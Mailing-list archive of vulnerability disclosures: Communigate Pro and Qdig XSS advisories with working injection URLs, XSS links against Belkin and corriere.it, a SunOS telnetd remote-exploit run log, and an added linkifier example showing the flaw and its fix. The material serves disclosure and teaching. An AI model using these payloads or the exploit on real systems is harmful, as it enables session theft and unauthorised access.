[Full-disclosure] Stored XSS on Communigate Pro 5.2.14 and prior versions

2009-07-24 Thread Andrea Purificato - bunker
- Description
The Communigate Pro webmail framework is prone to a stored Cross Site
Scripting vulnerability through crafted plain-text email messages.

- Affected version:
5.2.14 and prior, as reported by Communigate:
http://www.communigate.com/cgatepro/History52.html

- Details
This vulnerability can be exploited if an attacker sends a plain-text
message containing a maliciously crafted URL to the victim's address;
the internal parser fails to handle the malicious URL correctly and
JavaScript code is executed every time the user reads the message.
An attacker may be able to use this vulnerability to steal sensitive
information from the user's webmail session (e.g. the current SessionID)
or to force the user's browser to perform actions on the attacker's behalf.

- Example of crafted URL
http://www.example.com/&z=";>alert(document.cookie)&f=

- Patch
Install Communigate Pro 5.2.15; the relevant changelog entry reads:
5.2.15 15-Jul-2009: * Bug Fix: WebUser: 5.1.2: links in plain text
messages could be processed incorrectly.

- Communigate
http://www.communigate.com/cgatepro/

-- 
Andrea Purificato
http://rawlab.mindcreations.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
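The advisory above describes the bug only in outline: the webmail client turns URLs found in a plain-text body into links, and a double quote inside the URL breaks out of the generated tag. The following is an added example, not Communigate Pro code and not a reconstruction of its parser; it shows a linkifier of that kind in a naive form and a hardened form, run over a constructed message that carries the crafted URL quoted in the advisory. The payload as preserved in the archive contains no tag after the `">` breakout, so the example demonstrates the attribute breakout itself, which is the defect, rather than a complete script injection. `linkifyNaive`, `linkifySafe`, `hrefOf` and the message text are all assumptions made for this example.

```javascript
// Added example for this page; it is not Communigate Pro code and does not
// reproduce its parser. It shows the class of bug the advisory describes:
// a webmail linkifier that turns URLs in a plain-text body into <a> tags
// by string concatenation, so a double quote inside the URL closes the
// href attribute and the rest of the "URL" becomes markup.

// Crafted URL taken from the advisory above.
const CRAFTED_URL = 'http://www.example.com/&z=";>alert(document.cookie)&f=';

// Constructed sample message body (plain text, as an attacker would send it).
const MESSAGE = [
  'Hi,',
  'have a look at ' + CRAFTED_URL + ' and tell me what you think.',
  'bye',
].join('\n');

// Loose URL matcher of the kind linkifiers use: scheme, then anything up to
// whitespace or '<'. The double quote is deliberately allowed through,
// which is what makes the naive version below exploitable.
const URL_RE = /https?:\/\/[^\s<]+/g;

// Escape the five characters that matter in HTML text and in a
// double-quoted attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Inverse of escapeHtml, used to read an attribute value back as a browser would.
function unescapeHtml(s) {
  const map = { '&amp;': '&', '&lt;': '<', '&gt;': '>', '&quot;': '"', '&#39;': "'" };
  return s.replace(/&(amp|lt|gt|quot|#39);/g, (e) => map[e]);
}

// Vulnerable linkifier: the matched URL is spliced straight into the tag.
function linkifyNaive(text) {
  return text.replace(URL_RE, (url) => `<a href="${url}">${url}</a>`);
}

// Hardened linkifier: escape once, at the point of output, in both the
// attribute value and the link text. (A real client would also restrict
// the scheme so that javascript: URLs are never linked.)
function linkifySafe(text) {
  return text.replace(URL_RE, (url) => {
    const safe = escapeHtml(url);
    return `<a href="${safe}">${safe}</a>`;
  });
}

// Read back the href the way an HTML tokenizer would: the attribute value
// ends at the first double quote. Returns the decoded value, or null.
function hrefOf(html) {
  const m = /<a href="([^"]*)"/.exec(html);
  return m ? unescapeHtml(m[1]) : null;
}

// True if the linkifier kept the whole URL inside the attribute, i.e. no
// part of it escaped into markup.
function urlStaysInAttribute(linkify, url) {
  return hrefOf(linkify(url)) === url;
}

// Stand-alone demonstration (guarded so the functions can also be imported).
if (typeof require !== 'undefined' && require.main === module) {
  console.log('naive :', linkifyNaive(MESSAGE));
  console.log('safe  :', linkifySafe(MESSAGE));
  console.log('naive keeps URL in href?', urlStaysInAttribute(linkifyNaive, CRAFTED_URL));
  console.log('safe  keeps URL in href?', urlStaysInAttribute(linkifySafe, CRAFTED_URL));
}
```

With the naive linkifier the href read back by `hrefOf` stops at `http://www.example.com/&z=`, and everything after the quote (`;>alert(document.cookie)&f=">...`) lands outside the tag as markup and text; with the hardened one the whole crafted URL survives as the attribute value and the quote and angle bracket reach the page only as `&quot;` and `&gt;`. The check worth keeping from this is `urlStaysInAttribute`: whatever the linkifier does, the attribute a browser tokenizes must equal the URL the parser matched.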


Re: [Full-disclosure] informative...

2007-08-29 Thread Andrea Purificato - bunker
On Wednesday 29 August 2007, Fabio Pietrosanti (naif) wrote:

> http://seclists.org/fulldisclosure/2007/Jul/0504.html
> comments?

Hi Fabio,

I fully agree with you, but I have less trouble than you speaking about this 
type of vulnerability after reporting the XSS to the owner.
If nobody replies to me after a reasonable time, I consider my work finished and 
I feel free to talk about anything, in the spirit of full-disclosure.

If someone wants to publish "0day" XSS without reporting it to the owner, it's not 
my problem!

Regards,
-- 
Andrea "bunker" Purificato
+++[>++>+>
++<<<-]>.>++.>.<--.>-.<+++.

http://rawlab.mindcreations.com 



Re: [Full-disclosure] informative...

2007-08-29 Thread Andrea Purificato - bunker
On Wed, 29/08/2007 at 09:31 -0400, Fabrizio wrote:
> And even more informative
> 
> http://www.belkin.com/search/?q=%3cscript%3ealert('XSS')%3c%2fscript%
> 3e&sid=1
> 

[Informative 2]

It seems to be a common practice; anyway, they were warned months ago, but
no answer...

http://sitesearch.corriere.it/searchresults.jsp?adsEnvironment=corriere&channel_par=corriere&ricerca_par=%22%3Cscript%3Ealert('XSS');%3C/script%3E


Bye,
-- 
Andrea "bunker" Purificato
+++[>++>+>
++<<<-]>.>++.>.<--.>-.<+++.

http://rawlab.mindcreations.com



Re: [Full-disclosure] 0day Oracle 10g exploit - dbms_aq.enqueue - become DBA

2007-04-02 Thread Andrea Purificato - bunker
On Monday 02 April 2007 20:12, Gadi Evron wrote:

> Not a 0day. Just publicly released exploit code.

You're right, sorry for the mistake. I meant "first public exploit".

> This is:
> 1. Patched.

Yes: CPUJan2007

> 2. Not publicly exploitable.

The permission is granted to PUBLIC on 9.0.1.x through 10.1.0.x (without CPUJan2007).


Thanks for clarification,
-- 
Andrea "bunker" Purificato
+++[>++>+>
++<<<-]>.>++.>.<--.>-.<+++.

http://rawlab.mindcreations.com 



Re: [Full-disclosure] "0day was the case that they gave me"

2007-02-11 Thread Andrea Purificato - bunker
At 07:00, Sunday 11 February 2007, Tyop? wrote:

> Ok. Someone have a Sol10?

(11:10) [EMAIL PROTECTED]:~$ sh test.sh

 SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [EMAIL PROTECTED]
 ./sunos  
 ./sunos localhost bin

(11:11) [EMAIL PROTECTED]:~$ sh test.sh sparclab bunker

 SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [EMAIL PROTECTED]

 ALEX ALEX

 Trying 23.255.212.138...
 Connected to sparclab.
 Escape character is '^]'.
 Last login: Sun Feb 11 11:08:21 from syn
 Sun Microsystems Inc.   SunOS 5.11  snv_49  October 2007

(11:09) [EMAIL PROTECTED]:~$ uname -a; id;
 SunOS sparclab 5.11 snv_49 sun4u sparc SUNW,Ultra-5_10
 uid=100(bunker) gid=1(other)

(11:09) [EMAIL PROTECTED]:~$ exit
 logout
 Connection closed by foreign host.




Absolutely disarming!
-- 
Andrea "bunker" Purificato
+++[>++>+>
++<<<-]>.>++.>.<--.>-.<+++.

http://rawlab.mindcreations.com 



Re: [Full-disclosure] [XSS] Qdig - Quick Digital Image Gallery Version 1.2.9.3 and -devel

2007-02-11 Thread Andrea Purificato - bunker
At 21:54, Saturday 10 February 2007, Andrea Purificato - bunker wrote:

> Version affected: qdig-1.2.9.3, qdig-devel-20060624

Bug fixed by 1.2.9.4 and devel-20070210


Thanks to haganafox for his work,
-- 
Andrea "bunker" Purificato
+++[>++>+>
++<<<-]>.>++.>.<--.>-.<+++.

http://rawlab.mindcreations.com 



[Full-disclosure] [XSS] Qdig - Quick Digital Image Gallery Version 1.2.9.3 and -devel

2007-02-10 Thread Andrea Purificato - bunker
Qdig - Quick Digital Image Gallery - http://qdig.sourceforge.net/

Version affected: qdig-1.2.9.3, qdig-devel-20060624 

Risk: XSS

Description:
Qdig is an easy-to-use PHP script that dynamically presents your digital image 
files as an online gallery or set of galleries.

Vulnerability:
It is vulnerable to XSS (Cross Site Scripting) attacks;
examples:
 - /?Qwd=\0%22%3Cbody%20onload=alert(String.fromCharCode(88,83,83))%3E 
 - /?Qwd=\0%22%3Cbody%20onload=document.write(navigator.userAgent);%3E  

Solution:
No solution until the author answers.

Credits: 
Andrea "bunker" Purificato - http://rawlab.mindcreations.com


Mail copied to the author: haganafox AT sf (no other email found)
-- 
Andrea "bunker" Purificato
+++[>++>+>
++<<<-]>.>++.>.<--.>-.<+++.

http://rawlab.mindcreations.com 



Re: [Full-disclosure] PS Information Leak on HP True64 Alpha OSF1 v5.1 1885

2007-02-07 Thread Andrea Purificato - bunker
At 21:05, Tuesday 6 February 2007, you wrote:

> I would guess the behavior you just discovered has been
> known for a long time.

It doesn't mean that things will always be that way :-)
See here: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102215-1

> PS: Why should ps to work correctly without the setuid bit?

because all recent "ps" implementations work without it, and removing the bit 
from the executable is not a workaround in this case.
Maybe it's time to abandon the stone age :-)


Bye,
-- 
Andrea "bunker" Purificato
+++[>++>+>
++<<<-]>.>++.>.<--.>-.<+++.

http://rawlab.mindcreations.com 
